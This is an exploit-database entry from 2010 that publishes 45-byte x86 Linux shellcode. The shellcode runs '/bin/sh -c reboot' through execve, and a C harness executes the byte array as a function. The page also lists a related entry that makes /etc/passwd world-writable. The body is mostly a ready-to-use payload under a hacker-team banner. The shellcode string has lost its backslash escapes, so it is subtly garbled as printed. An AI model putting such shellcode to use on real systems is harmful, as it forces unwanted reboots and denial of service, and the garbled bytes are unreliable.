[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode
# Published : 2010-05-31
# Author : gunslinger_
# Previous Title : change mode 0777 of "/etc/passwd" with sys_chmod syscall
# Next Title : Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm gunslinger_ member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
Name : 45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(void)
{
char dark[] = "x6ax0bx58x99x52x68x6fx74x20x20x68x72x65x62x6f"
"x89xe6x52x66x68x2dx63x89xe1x52x68x2fx2fx73x68"
"x68x2fx62x69x6ex89xe3x52x56x51x53x89xe1xcdx80";
void(*door)()=(void*)dark;
door();
return 0;
}